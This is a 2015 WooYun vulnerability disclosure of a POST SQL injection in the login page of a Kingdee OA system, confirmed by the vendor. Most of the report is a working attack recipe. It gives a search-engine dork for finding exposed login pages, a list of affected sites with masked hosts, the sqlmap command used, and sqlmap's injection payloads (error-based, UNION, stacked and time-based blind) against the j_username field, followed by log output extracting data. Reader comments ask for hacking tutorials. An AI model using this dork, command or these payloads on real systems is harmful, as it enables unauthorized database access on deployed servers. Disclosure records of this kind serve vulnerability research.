缺陷编号:WooYun-2015-0128680
漏洞标题:金蝶某OA办公系统通用POST注入漏洞
相关厂商:金蝶
漏洞作者:0x 80
提交时间:2015-07-23 17:32
公开时间:2015-10-22 10:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开
金蝶某OA办公系统通用POST注入漏洞居然是通用注入,没注意
G.CN 百度 inurl:/themes/mskin/login/inurl://mskin/login/
1 |
POST data: j_mode=dynamic&j_from=oa&selectLoginType=static&j_username=&j_passwor<br>d=&Submit=login |
存在POST注入受影响的站:http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp**.**.**.**:7890/oa/themes/mskin/login/login.jsphttp://**.**.**.**:7890/oa/themes/mskin/login/login.jsphttp://**.**.**.**/themes/mskin/login/login.jsphttp://**.**.**.**/oa/themes/mskin/login/login.jsphttp://**.**.**.**/oa/themes/mskin/login/login.jsphttp://**.**.**.**/oa/themes/mskin/login/login.jsphttp://**.**.**.**:7890/oa/themes/mskin/login/login.jsphttp://**.**.**.**:7890/oa/themes/mskin/login/login.jsphttp://**.**.**.**:81/oa/themes/mskin/login/login.jsphttp://**.**.**.**/oa/themes/mskin/login/login.jsphttp://**.**.**.**:7890/oa/themes/mskin/login/login.jsp**.**.**.**:7890/easoa/themes/mskin/login/login.jsphttp://**.**.**.**:7890/easoa/themes/mskin/login/login.jsphttp://**.**.**.**/oa/themes/mskin/login/login.jsp?login_error=quithttp://**.**.**.**:7890/easoa/themes/mskin/login/login.jsphttp://**.**.**.**:7890/oa/themes/mskin/login/loginFullScreen.jsp?login_error=
POST sqlmap.py -u http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp --forms --dbsPlace: POSTParameter: j_usernameType: error-basedTitle: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clausePayload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd' AND 9158=CONVERT(INT,(CHAR(58) CHAR(107) CHAR(104) CHAR(109) CHAR(58) (SELECT (CASE WHEN (9158=9158) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(99) CHAR(112) CHAR(102) CHAR(58))) AND 'wnuh'='wnuh&j_password=&Submit=loginType: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(107) CHAR(104) CHAR(109) CHAR(58) CHAR(78) CHAR(113) CHAR(82) CHAR(89) CHAR(102) CHAR(119) CHAR(84) CHAR(100) CHAR(69) CHAR(80) CHAR(58) CHAR(99) CHAR(112) CHAR(102) CHAR(58),NULL,NULL--&j_password=&Submit=loginType: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd'; WAITFOR DELAY '0:0:5'--&j_password=&Submit=loginType: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blindPayload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd' WAITFOR DELAY '0:0:5'--&j_password=&Submit=login---do you want to exploit this SQL injection? [Y/n] y[14:22:16] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2000 or 7web application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Microsoft SQL Server 2008
http://**.**.**.**/themes/mskin/login/login.jsp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
I<br> [14:27:08] [ERROR] unable to properly validate last character value ('M')..<br> M<br> [14:27:14] [ERROR] invalid character detected. retrying..<br> [14:27:14] [WARNING] increasing time delay to 2 seconds<br> [14:27:21] [ERROR] invalid character detected. retrying..<br> [14:27:21] [WARNING] increasing time delay to 3 seconds<br> [14:27:34] [ERROR] invalid character detected. retrying..<br> [14:27:34] [WARNING] increasing time delay to 4 seconds<br> [14:27:46] [ERROR] invalid character detected. retrying..<br> [14:27:46] [WARNING] increasing time delay to 5 seconds<br> ECONV<br> [14:30:04] [ERROR] invalid character detected. retrying..<br> [14:30:04] [WARNING] increasing time delay to 6 seconds<br> [14:30:20] [ERROR] unable to properly validate last character value ('b')..<br> b<br> [14:30:53] [ERROR] invalid character detected. retrying..<br> [14:30:53] [WARNING] increasing time delay to 2 seconds<br> [14:31:10] [ERROR] invalid character detected. retrying..<br> [14:31:10] [WARNING] increasing time delay to 3 seconds<br> [14:31:23] [ERROR] invalid character detected. retrying..<br> [14:31:23] [WARNING] increasing time delay to 4 seconds<br> [14:31:48] [ERROR] invalid character detected. retrying..<br> [14:31:48] [WARNING] increasing time delay to 5 seconds<br> [14:32:23] [ERROR] invalid character detected. retrying..<br> [14:32:23] [WARNING] increasing time delay to 6 seconds<br> RT!A<br> [14:33:27] [INFO] retrieved:<br> [14:33:43] [ERROR] unable to properly validate last character value ('e')..<br> eL<br> [14:33:59] [ERROR] invalid character detected. retrying..<br> [14:33:59] [WARNING] increasing time delay to 2 seconds<br> O<br> [14:34:24] [ERROR] invalid character detected. retrying..<br> [14:34:24] [WARNING] increasing time delay to 3 seconds<br> W<br> [14:34:53] [ERROR] invalid character detected. retrying..<br> [14:34:53] [WARNING] increasing time delay to 4 seconds |
POST sqlmap.py -uhttp://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp --forms --dbs
POST注入,参数
危害等级:高
漏洞Rank:18
确认时间:2015-07-2410:21
谢谢对金蝶的关注,为我们发现安全漏洞。我们已通知相关部门修复。
暂无
洞主 一天提好几个漏洞啊! 有没有一些渗透视频教程啊
@泪雨无魂 没有额
@0x 80 你到我群里看看吧
@0x 80 我已经加入你的群了,希望能向你学习。。
@0x 80 请问群多少
@小懒虫 182910788
@0x 80 求进裙 加不进去
原文连接
的情况下转载,若非则不得使用我方内容。